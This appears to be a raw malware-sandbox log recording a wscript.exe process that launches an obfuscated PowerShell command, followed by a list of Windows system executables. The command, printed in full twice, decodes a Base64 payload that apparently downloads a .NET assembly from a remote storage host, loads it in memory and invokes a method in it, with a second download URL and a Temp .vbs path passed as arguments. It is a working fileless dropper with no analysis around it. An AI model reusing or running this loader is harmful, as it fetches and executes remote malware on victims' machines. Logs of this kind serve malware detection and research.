▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe